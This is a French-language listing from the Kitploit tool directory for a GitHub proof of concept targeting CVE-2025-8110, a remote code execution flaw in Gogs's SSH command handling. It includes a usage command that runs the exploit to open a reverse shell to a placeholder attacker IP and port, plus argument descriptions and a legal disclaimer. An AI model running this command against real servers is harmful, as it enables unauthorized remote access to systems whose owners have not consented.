Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/zabuqasem/gogs-cve-2025-8110
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubzabuqasem/gogs-cve-2025-8110

gogs-CVE-2025-8110

PoC CVE-2025-8110

Voir le dépôt
292il y a 8 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Preuve de concept (PoC) pour CVE-2025-8110 - Gogs

Ce dépôt contient une preuve de concept (PoC) pour CVE-2025-8110, une vulnérabilité d'exécution de code à distance (RCE) dans Gogs. L'exploit cible l'implémentation du serveur SSH interne, permettant aux attaquants d'injecter des commandes malveillantes via la configuration sshCommand.

Utilisation

Pour exécuter l'exploit, utilisez le script CVE-2025-8110.py avec l'URL cible de Gogs et votre hôte/port d'écoute pour le shell inversé.

root@kitploit:~
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>

Arguments

  • -u, --url: URL de base de l'instance Gogs cible (par ex., http://localhost:3000).
  • -lh, --host: Adresse IP vers laquelle le shell inversé doit se connecter.
Télécharger l’outil
  • -lp, --port: Port vers lequel le shell inversé doit se connecter.
  • -x, --proxy: (Facultatif) Utilise un proxy local à http://localhost:8080 pour le débogage.
  • Avertissement légal

    Cette preuve de concept (PoC) est uniquement à des fins éducatives et de recherche. Elle est destinée à aider les chercheurs en sécurité et les administrateurs à comprendre et à atténuer la vulnérabilité CVE-2025-8110.

    L'auteur décline toute responsabilité en cas d'utilisation non autorisée ou malveillante de ce code. Utilisez cet outil uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test. En utilisant ce code, vous acceptez d'assumer l'entière responsabilité de vos actions.